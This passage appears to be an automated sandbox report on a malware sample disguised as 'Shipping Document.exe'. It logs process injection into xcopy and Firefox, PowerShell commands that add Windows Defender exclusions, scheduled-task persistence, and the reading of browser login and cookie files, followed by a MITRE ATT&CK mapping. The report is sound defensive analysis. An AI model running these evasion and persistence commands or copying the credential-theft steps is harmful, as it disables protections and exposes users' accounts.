                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtAllocateVirtualMemory: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\Shipping Document.exe Memory written: C:\Users\user\Desktop\Shipping Document.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Memory written: C:\Users\user\AppData\Roaming\KOENBvWt.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: NULL target: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Shipping Document.exe Section loaded: NULL target: C:\Windows\SysWOW64\xcopy.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: NULL target: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: NULL target: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\xcopy.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\xcopy.exe Thread register set: target process: 7704
                Source: C:\Users\user\Desktop\Shipping Document.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe"
                Source: C:\Users\user\Desktop\Shipping Document.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe"
                Source: C:\Users\user\Desktop\Shipping Document.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp"
                Source: C:\Users\user\Desktop\Shipping Document.exe Process created: C:\Users\user\Desktop\Shipping Document.exe "C:\Users\user\Desktop\Shipping Document.exe"
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp"
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Process created: C:\Users\user\AppData\Roaming\KOENBvWt.exe "C:\Users\user\AppData\Roaming\KOENBvWt.exe"
                Source: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe Process created: C:\Windows\SysWOW64\xcopy.exe "C:\Windows\SysWOW64\xcopy.exe"
                Source: C:\Windows\SysWOW64\xcopy.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3696428465.0000000001570000.00000002.00000001.00040000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358764726.0000000001570000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3696428465.0000000001570000.00000002.00000001.00040000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358764726.0000000001570000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3696428465.0000000001570000.00000002.00000001.00040000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358764726.0000000001570000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
                Source: rtO5LARBHjW9nKZi.exe, 00000015.00000002.3696428465.0000000001570000.00000002.00000001.00040000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358764726.0000000001570000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Shipping Document.exe Queries volume information: C:\Users\user\Desktop\Shipping Document.exe VolumeInformation
                Source: C:\Users\user\Desktop\Shipping Document.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Shipping Document.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Shipping Document.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\Desktop\Shipping Document.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Shipping Document.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Shipping Document.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Queries volume information: C:\Users\user\AppData\Roaming\KOENBvWt.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                Source: C:\Users\user\Desktop\Shipping Document.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 10.2.Shipping Document.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 10.2.Shipping Document.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.3699622847.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3701837200.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.1438223772.0000000001420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\xcopy.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 10.2.Shipping Document.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 10.2.Shipping Document.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000016.00000002.3699622847.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000015.00000002.3701837200.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000A.00000002.1438223772.0000000001420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (one line per tactic column; a leading number is the report's signature count for that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                Execution: 1 Scheduled Task/Job; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
                Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Privilege Escalation: 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 312 Process Injection; 1 Scheduled Task/Job; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
                Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 13 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 41 Virtualization/Sandbox Evasion; 312 Process Injection
                Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                Discovery: 1 File and Directory Discovery; 113 System Information Discovery; 321 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
                Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                Command and Control: 3 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph (ID 1630657, sample Shipping Document.exe, start date 06/03/2025, architecture WINDOWS, score 100): Shipping Document.exe starts a second Shipping Document.exe, two powershell.exe instances (each with a conhost.exe; one also starts WmiPrvSE.exe) and schtasks.exe, and drops KOENBvWt.exe, KOENBvWt.exe:Zone.Identifier, tmpC1E2.tmp and Shipping Document.exe.log; KOENBvWt.exe starts schtasks.exe and a second KOENBvWt.exe; the second Shipping Document.exe injects into rtO5LARBHjW9nKZi.exe, which contacts the listed domains and IPs and starts xcopy.exe, which in turn starts firefox.exe. Signature annotations on the graph nodes repeat the signatures listed above.
